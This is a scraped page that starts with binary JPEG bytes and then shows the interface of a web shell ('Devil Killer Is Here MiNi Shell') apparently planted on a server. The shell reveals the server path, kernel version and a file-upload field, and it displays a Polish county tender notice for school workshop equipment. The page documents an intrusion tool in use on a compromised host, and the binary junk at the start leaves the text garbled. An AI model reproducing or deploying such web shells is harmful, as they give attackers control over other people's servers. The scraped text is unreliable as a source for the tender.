JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221209/0048673401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Modernizacja kompleksu pracowni ZSP nr 2 i ZSP nr 4 w ramach projektu „ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ” – Doposażenie ZSP nr 2/ ZSP nr 4 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT NOWOSOLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770103</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">MONIUSZKI 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sól</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiat-nowosolski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-nowosolski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja kompleksu pracowni ZSP nr 2 i ZSP nr 4 w ramach projektu „ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ” – Doposażenie ZSP nr 2/ ZSP nr 4 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e25ce734-77a2-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00486734</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017449/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Modernizacja kompleksu pracowni ZSP nr 2 i ZSP nr 4 w ramach projektu „Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji” – Doposażenie ZSP nr 2 / ZSP nr 4</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> w ramach projektu „ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/sp_nowasol <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/sp_nowasol</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Zamawiający, zgodnie z § 3 ust. 3<br/>Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej:<br/>“Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas(hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2) Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>3) Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>4) Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>5) Osobą uprawnioną do komunikowania się w zakresie zagadnień związanych z prowadzoną procedurą jest Elżbieta Wasik lub<br/>osoba ją zastępująca</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych jest Starostwo Powiatowe w Nowej Soli .<br/>Kontakt z administratorem:<br/>1. Osobiście, w siedzibie Starostwa Powiatowego w Nowej Soli<br/>2. telefonicznie: 68 458 68 00<br/>3. pisemnie: Starostwo Powiatowe w Nowej Soli, ul. Moniuszki 3, 67 100 Nowa Sól lub na adres poczty elektronicznej:<br/>poczta@powiat-nowosolski.pl<br/>Inspektor Ochrony Danych<br/>W Starostwie Powiatowym w Nowej Soli został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować za<br/>pomocą poczty elektronicznej: iod@powiat-nowosolski.plCele przetwarzania, czas przechowywania poszczególnych kategorii<br/>danych, podanie danych<br/>Dane będą przetwarzaneprzezStarostwo Powiatowe w Nowej Soli w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego zgodnie z art. 6 ust. 1 lit. c) i e) RODO n apodstawie:<br/>• Ustawy z dnia 11 września 2019 r. prawo zamówień publicznych<br/>Dane będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Odbiorcy danych<br/>Dane mogą zostać udostępnione osobom lub podmiotom, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych.<br/>Prawa osoby, której<br/>Przysługujące prawa:<br/>Nr postępowania : IF.272.8.2022 dane dotyczą<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>− na podstawie art. 16 RODO prawo do sprostowania;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>Prawa nie mające zastosowania:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania \<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IF.272.37.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CPV Oznaczenie według Wspólnego Słownika Zamówień ( kod CPV)<br/>39162100 – 6 Pomoce dydaktyczne<br/>39100000 – 3 Meble<br/>39290000 – 1 Wyposażenie różne<br/>39717200 – 3 Urządzenie klimatyzacyjne<br/>1. Przedmiotem zamówienia jest modernizacja / doposażenie pracowni w ZSP nr 2 i ZSP nr 4 w ramach projektu<br/>„ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ”<br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji, odbioru, miejsca<br/>dostawy oraz warunki płatności określają :<br/>1) Szczegółowy opis przedmiotu zamówienia (SOPZ ), na który składa się :<br/>Załącznik nr 1.1. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej – meble ( dla Części nr 1 );<br/>Załącznik nr 1.2. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej ( dla Części nr 2 );<br/>Załącznik nr 1.3. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych –<br/>pomoce dydaktyczne ( dla Części nr 3);<br/>Załącznik nr 1.4. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych ( dla<br/>Części nr 4);<br/>Załącznik nr 1.5. - Specyfikacja techniczna wyposażenia pracowni gospodarki magazynowej( dla Części nr 5);<br/>Załącznik nr 1.6. - Specyfikacja techniczna wyposażenia - klimatyzatory ( dla Części nr 6);<br/>2) Projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>3. Równoważność<br/>W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego Wykonawcę, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty,pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”. Jeśli Zamawiający<br/>wskazał marki lub nazwy handlowe określa to klasę produktu, będącego przedmiotem zamówienia i służy<br/>ustaleniu standardu, a nie wskazuje na konkretny wyrób czy producenta.<br/>W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt<br/>2 i ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne z opisywanym. Wykonawca, który oferuje rozwiązania<br/>równoważne do wskazanych norm jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy<br/>spełniają wymagania określone przez Zamawiającego poprzez podanie nazwy oferowanego produktu, nazwy<br/>producenta i nr katalogowego bądź innych cech jednoznacznie wskazujących na zaoferowane produkty oraz<br/>dołączenie do oferty, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107<br/>ustawy Pzp, udowadniając, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do<br/>wykonania umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia.<br/>W przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty, specyfikacje techniczne i<br/>systemy odniesienia, o których mowa w art. 101 ust. 4 ustawy Pzp należy rozumieć jako przykładowe.<br/>Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza w każdym przypadku zastosowanie rozwiązań<br/>równoważnych opisywanych w treści SWZ. Każdorazowo gdy wskazana jest w niniejszej SWZ lub załącznikach do<br/>SWZ norma, aprobata, specyfikacja techniczna lub system odniesienia należy przyjąć, że w odniesieniu do niej<br/>użyto sformułowania „lub równoważna”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CPV Oznaczenie według Wspólnego Słownika Zamówień ( kod CPV)<br/>39162100 – 6 Pomoce dydaktyczne<br/>39100000 – 3 Meble<br/>39290000 – 1 Wyposażenie różne<br/>39717200 – 3 Urządzenie klimatyzacyjne<br/>1. Przedmiotem zamówienia jest modernizacja / doposażenie pracowni w ZSP nr 2 i ZSP nr 4 w ramach projektu<br/>„ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ”<br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji, odbioru, miejsca<br/>dostawy oraz warunki płatności określają :<br/>1) Szczegółowy opis przedmiotu zamówienia (SOPZ ), na który składa się :<br/>Załącznik nr 1.1. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej – meble ( dla Części nr 1 );<br/>Załącznik nr 1.2. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej ( dla Części nr 2 );<br/>Załącznik nr 1.3. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych –<br/>pomoce dydaktyczne ( dla Części nr 3);<br/>Załącznik nr 1.4. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych ( dla<br/>Części nr 4);<br/>Załącznik nr 1.5. - Specyfikacja techniczna wyposażenia pracowni gospodarki magazynowej( dla Części nr 5);<br/>Załącznik nr 1.6. - Specyfikacja techniczna wyposażenia - klimatyzatory ( dla Części nr 6);<br/>2) Projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>3. Równoważność<br/>W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego Wykonawcę, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty,pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”. Jeśli Zamawiający<br/>wskazał marki lub nazwy handlowe określa to klasę produktu, będącego przedmiotem zamówienia i służy<br/>ustaleniu standardu, a nie wskazuje na konkretny wyrób czy producenta.<br/>W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt<br/>2 i ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne z opisywanym. Wykonawca, który oferuje rozwiązania<br/>równoważne do wskazanych norm jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy<br/>spełniają wymagania określone przez Zamawiającego poprzez podanie nazwy oferowanego produktu, nazwy<br/>producenta i nr katalogowego bądź innych cech jednoznacznie wskazujących na zaoferowane produkty oraz<br/>dołączenie do oferty, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107<br/>ustawy Pzp, udowadniając, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do<br/>wykonania umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia.<br/>W przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty, specyfikacje techniczne i<br/>systemy odniesienia, o których mowa w art. 101 ust. 4 ustawy Pzp należy rozumieć jako przykładowe.<br/>Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza w każdym przypadku zastosowanie rozwiązań<br/>równoważnych opisywanych w treści SWZ. Każdorazowo gdy wskazana jest w niniejszej SWZ lub załącznikach do<br/>SWZ norma, aprobata, specyfikacja techniczna lub system odniesienia należy przyjąć, że w odniesieniu do niej<br/>użyto sformułowania „lub równoważna”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub 